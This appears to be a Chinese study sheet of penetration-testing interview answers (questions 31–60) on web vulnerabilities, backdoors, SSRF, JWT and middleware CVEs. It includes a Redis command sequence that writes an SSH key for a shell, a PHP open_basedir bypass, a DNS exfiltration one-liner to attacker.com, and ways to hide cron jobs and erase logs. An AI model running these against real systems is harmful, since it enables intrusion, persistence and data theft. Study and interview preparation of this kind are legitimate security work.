安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
目录
[31. Cookie测试内容](#31. Cookie测试内容)
[32. 业务逻辑漏洞类型](#32. 业务逻辑漏洞类型)
[33. 文件包含漏洞](#33. 文件包含漏洞)
[34. 任意密码重置漏洞](#34. 任意密码重置漏洞)
[35. 仅允许上传ZIP的渗透思路](#35. 仅允许上传ZIP的渗透思路)
[36. aspx木马权限比asp大的原因](#36. aspx木马权限比asp大的原因)
[37. 单一登录页面的渗透思路](#37. 单一登录页面的渗透思路)
[38. 有危害的HTTP请求头](#38. 有危害的HTTP请求头)
[39. 越权访问类型区别](#39. 越权访问类型区别)
[40. XSS分类与存储型XSS](#40. XSS分类与存储型XSS)
[41. 主机入侵排查日志](#41. 主机入侵排查日志)
[42. Python常用标准库](#42. Python常用标准库)
[43. reverse_tcp vs bind_tcp](#43. reverse_tcp vs bind_tcp)
[44. OAuth认证漏洞](#44. OAuth认证漏洞)
[45. 获取CDN后真实IP](#45. 获取CDN后真实IP)
[46. 跨域实现方案](#46. 跨域实现方案)
[47. JSONP跨域 vs CORS跨域](#47. JSONP跨域 vs CORS跨域)
[48. 常见排序算法](#48. 常见排序算法)
[49. SSRF漏洞利用](#49. SSRF漏洞利用)
[50. 常见后门方式](#50. 常见后门方式)
[51. open_basedir绕过](#51. open_basedir绕过)
[53. 蓝队反杀红队场景](#53. 蓝队反杀红队场景)
[54. Linux计划任务隐藏](#54. Linux计划任务隐藏)
[55. Redis未授权getshell](#55. Redis未授权getshell)
[57. Java中间件漏洞举例](#57. Java中间件漏洞举例)
[58. DNS外带漏洞利用场景](#58. DNS外带漏洞利用场景)
[59. HTTP-Only Cookie绕过](#59. HTTP-Only Cookie绕过)
[60. 中间件漏洞总结](#60. 中间件漏洞总结)
31 cookie你会测试什么内容 32 说出几个业务逻辑漏洞类型? 33 简述文件包含漏洞 34 业务逻辑漏洞,用户任意密码重置有什么例子,因为什么因素导致的? 35 渗透测试过程中发现一个只能上传zip文件的功能,有什么可能的思路? 36 为什么aspx木马权限比asp大? 37 只有一个登录页面有哪些思路? 38 请求头中哪些是有危害的? 39 谈谈水平/垂直/未授权越权访问的区别? 40 xss有什么?执行存储型的xss的危害和原理 41 主机疑似遭到入侵,要看哪里的日志 42 python常用的标准库 43 reverse_tcp 和 bind_tcp 的区别? 44 oauth认证过程中可能会出现什么问题,导致什么样的漏洞? 45 做了cdn的网站如何获取真实IP 46 如何实现跨域? 47 jsonp跨域与CORS跨域的区别? 48 算法?了解过什么排序? 49 SSRF漏洞利用? 50 常见后门方式? 51 open_basedir访问目录限制绕过方法? 52 PHP代码审计中容易出问题的点? 53 红蓝对抗中蓝队反杀红队场景和姿势? 54 linux计划任务,黑客隐藏自己的计划任务会怎么做? 55 Redis未授权常见getshell的几种方式? 56 JWT的攻击手法?(头部、负载、签名) 57 JAVA中间件的漏洞,举几个例子? 58 DNS外带可以用在哪些漏洞? 59 HTTP-Only禁止的是JS读取cookie信息,如何绕过这个获取cookie 60 中间件漏洞总结?
31. Cookie测试内容
markdown
1. **安全属性检测** - `HttpOnly`(防XSS窃取)、`Secure`(仅HTTPS传输)、`SameSite`(防CSRF) 2. **有效性验证** - 过期时间、域/路径权限、篡改后是否失效 3. **敏感信息泄露** - 是否存在明文用户名、密码、SessionID 4. **会话管理** - 退出登录后Cookie是否清除、多终端登录冲突处理
32. 业务逻辑漏洞类型
精简至6类核心漏洞:
- 订单篡改(如价格参数修改)
- 验证绕过(短信验证码未与账号绑定)
- 竞争条件(并发请求薅优惠券)
- 权限缺失(平行越权删除他人订单)
- 流程跳过(未校验步骤顺序强制跳转)
- 条件滥用(无限领取新人福利)
33. 文件包含漏洞
pmarkdown
- **原理**:服务端未过滤用户输入的文件路径,导致恶意文件执行。 - **类型**: - **本地包含(LFI)**:包含服务器本地文件(如`?page=/etc/passwd`) - **远程包含(RFI)**:加载外部URL文件(需`allow_url_include=On`) - **危害**:敏感文件读取、代码执行、配合文件上传getshell。
34. 任意密码重置漏洞
例子与成因:
漏洞场景 导致原因 验证码未绑定用户 修改手机号参数重置他人密码 密码凭证可爆破 短信/邮箱验证码位数少无限制 重置链接可预测 Token未随机化(如用时间戳) 跳过验证步骤 强制访问最终重置接口
35. 仅允许上传ZIP的渗透思路
markdown
1. **ZIP炸弹**:上传高压缩比文件导致服务拒绝 2. **路径穿越**:解压时利用`../../`覆盖系统文件 3. **恶意符号链接**:包含指向敏感文件的软链接 4. **解压RCE**:利用解压程序漏洞(如Zip Slip CVE-2018-1000845) 5. **隐藏文件类型**:修改后缀为.zip实则上传.jsp/.php文件
36. aspx木马权限比asp大的原因
markdown
- **.NET框架特性**:aspx基于.NET拥有更完整的API访问权限(如操作注册表、调用系统进程) - **运行环境差异**:ASP运行于IIS沙盒,ASPX以更高权限的`aspnet_wp.exe`进程执行 - **组件支持**:可直接调用`System.Diagnostics`执行系统命令
37. 单一登录页面的渗透思路
markdown
1. **爆破攻击**:字典爆破账号密码、验证码 2. **SQL注入**:用户名参数尝试`admin' --` 3. **密码重置绕过**:跳转至重置页面或修改密码参数 4. **响应分析**:差异响应判断有效用户(如"用户不存在"提示) 5. **框架漏洞**:利用Struts2、Spring等历史RCE漏洞
38. 有危害的HTTP请求头
危险头部及利用:
Host: 域名劫持、缓存污染X-Forwarded-For: IP欺骗绕过IP限制User-Agent: 注入XSS或利用特定UA的解析漏洞Referer: 开放重定向漏洞Cookie: 敏感信息泄露、Session固定攻击
39. 越权访问类型区别
markdown
| 类型 | 特点 | 例子 | |------------|-------------------------------|--------------------------| | **水平越权** | 同权限用户访问他人数据 | 修改URL参数查看他人订单 | | **垂直越权** | 低权限用户执行高权限操作 | 普通用户访问管理员接口 | | **未授权** | 无需登录直接访问受限资源 | 直接访问/admin未跳转登录 |
40. XSS分类与存储型XSS
markdown
- **XSS类型**: - 反射型(URL参数即时触发) - 存储型(恶意代码存入数据库) - DOM型(前端JS操作触发) - **存储型XSS原理**: 用户输入(如评论)未经过滤存入数据库 → 其他用户访问时加载执行恶意脚本 - **危害**: - 窃取Cookie实现会话劫持 - 钓鱼攻击伪造登录框 - 传播蠕虫(如微博早期XSS蠕虫)
41. 主机入侵排查日志
关键日志位置:
- 系统日志 :
- Linux:
/var/log/auth.log(登录记录)、/var/log/syslog- Windows: 事件查看器(安全日志ID 4624/4625)
- Web日志 :Apache/Nginx访问日志(
access.log)- 应用日志 :数据库操作日志、中间件日志(如Tomcat
catalina.out)- 安全设备:HIDS记录、防火墙拦截日志
42. Python常用标准库
markdown
1. **系统交互**:`os`, `sys`, `subprocess` 2. **网络请求**:`urllib`, `requests`(需安装) 3. **数据处理**:`json`, `csv`, `re`(正则) 4. **并发**:`threading`, `multiprocessing` 5. **工具类**:`datetime`, `hashlib`, `argparse`
43. reverse_tcp vs bind_tcp
markdown
| 类型 | 工作原理 | 适用场景 | |--------------|------------------------------|------------------------| | **reverse_tcp** | 木马主动连接攻击者服务器 | 绕过受害者防火墙出站规则 | | **bind_tcp** | 木马监听本地端口等待连接 | 内网渗透直连目标 |
44. OAuth认证漏洞
漏洞与后果:
- 重定向劫持 :
redirect_uri未校验 → 令牌泄露给攻击者- Scope滥用:未限制权限范围 → 获取超范围用户数据
- CSRF攻击:未绑定state参数 → 劫持账号绑定攻击者应用
- 令牌泄露:URL中传递Token → 被浏览器历史记录泄露
45. 获取CDN后真实IP
markdown
1. **历史DNS记录**:查询`securitytrails.com`等平台 2. **子域名探测**:`mail.example.com`可能未使用CDN 3. **SSL证书匹配**:通过Censys搜索相同证书IP 4. **邮件服务器**:从系统邮件Header提取源IP 5. **特定请求**: - 发送非法Host头诱发CDN回源 - 利用DDoS使CDN回源暴露IP
46. 跨域实现方案
markdown
- **JSONP**:通过`<script>`标签加载跨域数据(仅GET) - **CORS**:服务端设置`Access-Control-Allow-Origin`响应头 - **代理转发**:后端代理请求跨域资源(如Nginx配置) - **postMessage**:浏览器窗口间跨域通信 - **WebSocket**:不受同源策略限制
47. JSONP跨域 vs CORS跨域
markdown
| **特性** | JSONP | CORS | |----------------|---------------------------|-------------------------------| | **协议支持** | 仅GET | 所有HTTP方法 | | **安全性** | 易受XSS攻击 | 需预检请求(OPTIONS)验证 | | **实现方式** | 前端动态创建<script>标签 | 服务端添加响应头 | | **错误处理** | 难以捕获错误 | 标准HTTP错误码 |
48. 常见排序算法
对比表:
算法 时间复杂度 特点 冒泡排序 O(n²) 简单但效率低 快速排序 O(n log n) 平均 分治思想,常用 归并排序 O(n log n) 稳定,适合链表 堆排序 O(n log n) 原地排序,空间复杂度O(1)
49. SSRF漏洞利用
markdown
- **攻击内网服务**:扫描`192.168.x.x`或访问`file:///etc/passwd` - **云元数据利用**:访问`http://169.254.169.254`获取AWS/Aliyun密钥 - **协议封装**: - `gopher://` 构造Redis命令写SSH密钥 - `dict://` 探测端口开放情况 - **绕过技巧**: - 使用`[::]`IPv6格式、域名重定向、DNS Rebinding
50. 常见后门方式
markdown
1. **Web后门**:隐蔽的WebShell(如图片马、`.htaccess`解析漏洞) 2. **系统后门**: - Linux:添加SSH公钥、crontab定时任务 - Windows:隐藏用户账户、DLL劫持 3. **内存马**:注入到Java Agent/Tomcat Filter 4. **隧道后门**:ICMP/DNS隧道传输数据
51. open_basedir绕过
markdown
- **符号链接攻击**:创建指向目标目录的软链接 - **glob协议**:利用`glob://`协议遍历目录(PHP特定版本) - **命令执行函数**:通过`system()`执行`find`命令 - **chdir()突破**: ```php mkdir('bypass'); chdir('bypass'); chdir('../'); // 回退上级目录 ini_set('open_basedir','..'); // 重置路径
--- ### **52. PHP代码审计高危点** ```markdown 1. **输入未过滤**:`$_GET/$_POST`直接进入危险函数(如`eval()`) 2. **文件操作**:`include/require`引发文件包含,`move_uploaded_file`路径穿越 3. **命令执行**:`exec()`/`system()`参数可控 4. **反序列化**:`unserialize()`触发魔术方法(如`__wakeup()`) 5. **SQL拼接**:字符串拼接导致注入(尤其`mysqli_query`)
53. 蓝队反杀红队场景
markdown
1. **蜜罐陷阱**:伪造漏洞诱导攻击,记录红队IP/工具指纹 2. **流量分析**:识别C2服务器通信特征反向渗透 3. **时间差攻击**:在红队驻留阶段替换后门为反向控制程序 4. **法律取证**:通过日志固定证据,配合执法机关溯源
54. Linux计划任务隐藏
markdown
- **路径隐藏**:写入非标准路径(如`/dev/shm`) - **文件名伪装**:以`.`开头命名文件(如`.update.sh`) - **权限控制**:设置`chattr +i`防止删除 - **日志擦除**:覆盖`/var/log/cron`日志记录 - **动态任务**:通过内存马动态添加临时任务
55. Redis未授权getshell
markdown
1. **写SSH密钥**: ```bash redis-cli -h 目标IP config set dir /root/.ssh config set dbfilename authorized_keys set x "\n\n公钥内容\n\n" save
写WebShell:指定网站目录写入PHP文件
主从复制RCE:伪造恶意Redis主节点同步模块
56. JWT攻击手法
markdown- **头部篡改**: - 修改`alg`为`none`绕过签名(需删除签名) - **负载篡改**: - 修改`sub`或`role`提升权限 - 密钥爆破(弱密钥如`secret`) - **签名绕过**: - 密钥混淆攻击(HS256 vs RS256) - 注入`kid`参数指向恶意密钥
57. Java中间件漏洞举例
markdown
1. **Tomcat**: - CVE-2017-12615 PUT方法上传WebShell - CVE-2020-1938 Ghostcat文件包含 2. **WebLogic**: - CVE-2019-2725 反序列化RCE - CVE-2020-14882 未授权命令执行 3. **JBoss**: - JMXInvokerServlet 反序列化
58. DNS外带漏洞利用场景
markdown
- **无回显漏洞利用**: - SSRF/XXE/SQL盲注数据外传(`data.attacker.com`) - 命令执行结果分块传递(`nslookup $(whoami).attacker.com`) - **绕过防火墙**:DNS协议通常被放行
59. HTTP-Only Cookie绕过
markdown
1. **XSS+中间人攻击**: - 恶意JS发起请求 → 代理拦截响应头窃取Set-Cookie 2. **浏览器漏洞**: - 特定版本Chrome的XSS审核器绕过(CVE-2020-6519) 3. **物理接触**: - 直接读取浏览器内存(需本地执行程序)
60. 中间件漏洞总结
核心漏洞类型:
- 配置缺陷 :
- 目录列表开启(Apache
Options +Indexes)- 未删除默认页面(Tomcat
/manager/html)- 解析漏洞 :
- IIS 6.0分号解析(
a.asp;.jpg)- Nginx错误配置导致PHP解析(
a.jpg/.php)- 协议处理 :
- HTTP请求走私(CVE-2023-25690)
- FastCGI未授权访问
- 反序列化 :
- WebLogic/JBoss等Java中间件历史RCE漏洞